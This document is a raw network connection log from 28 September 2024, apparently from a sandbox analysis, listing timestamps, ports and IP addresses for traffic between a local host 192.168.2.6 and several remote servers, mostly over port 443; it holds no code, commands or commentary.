Sep 28, 2024 05:23:50.046420097 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.046433926 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.046459913 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.046479940 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.046627998 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.046674967 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.046679974 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.046696901 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.046731949 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.046742916 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.054910898 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.054953098 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.054980040 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.054986000 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.055011034 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.055030107 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.055171967 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.055214882 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.055229902 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.055237055 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.055253029 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.055280924 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.055469036 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.055512905 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.055530071 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.055536985 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.055567980 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.055587053 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.132328987 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.132354021 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.132453918 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.132460117 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.132489920 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.132509947 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.132520914 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.132525921 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.132539034 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.132577896 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.132806063 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.132822990 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.132853031 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.132858038 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.132875919 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.132888079 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.133125067 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.133141994 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.133179903 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.133184910 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.133202076 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.133224010 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.133479118 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.133502007 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.133527994 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.133532047 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.133553028 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.133573055 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.141887903 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.141915083 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.141983032 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.141988993 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.142035007 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.142159939 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.142177105 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.142230034 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.142230034 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.142235994 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.142272949 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.142411947 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.142427921 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.142472982 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.142477989 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.142512083 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.219263077 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.219285011 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.219338894 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.219373941 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.219399929 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.219423056 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.219506025 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.219521999 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.219551086 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.219558954 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.219579935 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.219594002 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.219732046 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.219744921 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.219772100 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.219779968 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.219800949 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.219820023 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.220097065 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.220112085 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.220139980 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.220156908 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.220174074 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.220191002 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.220593929 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.220613003 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.220639944 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.220647097 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.220666885 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.220695019 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.229032993 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.229054928 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.229093075 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.229110003 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.229130030 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.229150057 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.229268074 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.229285955 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.229314089 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.229320049 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.229345083 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.229362965 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.229525089 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.229542017 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.229568958 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.229578972 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.229604006 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.229619980 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.306598902 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.306670904 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.306740999 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.306759119 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.306787968 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.306809902 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.306843996 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.306895971 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.306912899 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.306920052 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.306947947 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.306968927 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.307066917 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.307112932 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.307120085 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.307153940 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.307182074 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.307193995 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.307328939 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.307369947 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.307399988 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.307414055 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.307434082 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.307538033 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.307588100 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.307789087 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.307796955 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.307836056 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.315992117 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.316039085 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.316087008 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.316092968 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.316106081 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.316121101 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.316247940 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.316291094 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.316307068 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.316315889 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.316337109 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.316356897 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.316651106 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.316704035 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.316718102 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.316725016 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.316761971 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.316773891 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.394083977 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.394145012 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.394191027 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.394198895 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.394221067 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.394242048 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.394311905 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.394356966 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.394373894 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.394382954 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.394392967 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.394422054 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.394464970 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.394505978 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.394520044 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.394525051 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.394565105 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.394644976 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.394686937 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.394700050 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.394706011 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.394736052 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.394752026 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.394886017 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.394931078 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.394947052 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.394954920 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.394978046 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.394992113 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.403083086 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.403126001 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.403175116 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.403181076 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.403217077 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.403230906 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.403307915 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.403346062 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.403368950 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.403379917 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.403400898 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.403417110 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.403579950 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.403623104 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.403640032 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.403646946 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.403672934 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.403697968 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.480911016 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.480978012 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.481048107 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.481057882 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.481101990 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.481161118 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.481208086 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.481226921 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.481250048 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.481276989 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.481297970 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.481391907 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.481436014 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.481457949 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.481462955 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.481476068 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.481496096 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.481607914 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.481652021 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.481663942 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.481674910 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.481699944 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.481720924 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.481834888 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.481879950 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.481895924 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.481901884 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.481934071 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.481945038 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.482039928 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.482078075 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.482094049 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.482099056 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.482119083 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.482131958 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.482199907 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:50.482244968 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.544610977 CEST	49739	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:50.544632912 CEST	443	49739	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:51.742984056 CEST	49742	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:51.743041039 CEST	443	49742	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:51.743108988 CEST	49742	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:51.743359089 CEST	49742	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:51.743374109 CEST	443	49742	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:52.198760986 CEST	443	49742	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:52.200604916 CEST	49742	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:52.202522039 CEST	49742	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:52.202538967 CEST	443	49742	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:52.204119921 CEST	49742	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:52.204125881 CEST	443	49742	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:53.175770998 CEST	443	49742	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:53.175827026 CEST	49742	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:53.175857067 CEST	443	49742	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:53.175892115 CEST	49742	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:53.175909996 CEST	443	49742	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:53.175945044 CEST	49742	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:53.175956964 CEST	443	49742	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:53.175991058 CEST	49742	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:53.176071882 CEST	443	49742	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:53.176109076 CEST	49742	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:53.244927883 CEST	49742	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:53.244978905 CEST	443	49742	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:53.341027975 CEST	49744	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:53.341070890 CEST	443	49744	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:53.341171980 CEST	49744	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:53.342365980 CEST	49744	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:53.342377901 CEST	443	49744	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:53.837814093 CEST	443	49744	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:53.837963104 CEST	49744	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:53.941255093 CEST	49744	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:53.941271067 CEST	443	49744	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:53.943572044 CEST	49744	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:53.943584919 CEST	443	49744	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:54.636414051 CEST	443	49744	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:54.636598110 CEST	443	49744	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:54.636674881 CEST	49744	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:54.636689901 CEST	49744	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:54.636905909 CEST	49744	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:23:54.636926889 CEST	443	49744	172.67.167.90	192.168.2.6
Sep 28, 2024 05:23:54.657011032 CEST	49745	80	192.168.2.6	45.132.206.251
Sep 28, 2024 05:23:54.661859035 CEST	80	49745	45.132.206.251	192.168.2.6
Sep 28, 2024 05:23:54.661942959 CEST	49745	80	192.168.2.6	45.132.206.251
Sep 28, 2024 05:23:54.662048101 CEST	49745	80	192.168.2.6	45.132.206.251
Sep 28, 2024 05:23:54.662106037 CEST	49745	80	192.168.2.6	45.132.206.251
Sep 28, 2024 05:23:54.666802883 CEST	80	49745	45.132.206.251	192.168.2.6
Sep 28, 2024 05:23:54.666923046 CEST	80	49745	45.132.206.251	192.168.2.6
Sep 28, 2024 05:23:54.666970968 CEST	80	49745	45.132.206.251	192.168.2.6
Sep 28, 2024 05:23:54.666980028 CEST	80	49745	45.132.206.251	192.168.2.6
Sep 28, 2024 05:23:55.448919058 CEST	80	49745	45.132.206.251	192.168.2.6
Sep 28, 2024 05:23:55.448976040 CEST	49745	80	192.168.2.6	45.132.206.251
Sep 28, 2024 05:23:58.506521940 CEST	49745	80	192.168.2.6	45.132.206.251
Sep 28, 2024 05:24:12.712990046 CEST	49747	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:24:12.713037968 CEST	443	49747	149.154.167.99	192.168.2.6
Sep 28, 2024 05:24:12.713114977 CEST	49747	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:24:12.715580940 CEST	49747	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:24:12.715616941 CEST	443	49747	149.154.167.99	192.168.2.6
Sep 28, 2024 05:24:13.329250097 CEST	443	49747	149.154.167.99	192.168.2.6
Sep 28, 2024 05:24:13.329332113 CEST	49747	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:24:13.458640099 CEST	49747	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:24:13.458663940 CEST	443	49747	149.154.167.99	192.168.2.6
Sep 28, 2024 05:24:13.459793091 CEST	443	49747	149.154.167.99	192.168.2.6
Sep 28, 2024 05:24:13.459853888 CEST	49747	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:24:13.463206053 CEST	49747	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:24:13.503428936 CEST	443	49747	149.154.167.99	192.168.2.6
Sep 28, 2024 05:24:13.647561073 CEST	443	49747	149.154.167.99	192.168.2.6
Sep 28, 2024 05:24:13.647617102 CEST	443	49747	149.154.167.99	192.168.2.6
Sep 28, 2024 05:24:13.647701979 CEST	49747	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:24:13.647716045 CEST	443	49747	149.154.167.99	192.168.2.6
Sep 28, 2024 05:24:13.647735119 CEST	49747	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:24:13.647778034 CEST	443	49747	149.154.167.99	192.168.2.6
Sep 28, 2024 05:24:13.647782087 CEST	49747	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:24:13.647876024 CEST	49747	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:24:13.648287058 CEST	49747	443	192.168.2.6	149.154.167.99
Sep 28, 2024 05:24:13.648298025 CEST	443	49747	149.154.167.99	192.168.2.6
Sep 28, 2024 05:24:13.652081013 CEST	49748	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:13.652154922 CEST	443	49748	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:13.652251005 CEST	49748	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:13.652538061 CEST	49748	443	192.168.2.6	172.67.167.90
Sep 28, 2024 05:24:13.652565002 CEST	443	49748	172.67.167.90	192.168.2.6
Sep 28, 2024 05:24:14.116240978 CEST	443	49748	172.67.167.90	192.168.2.6
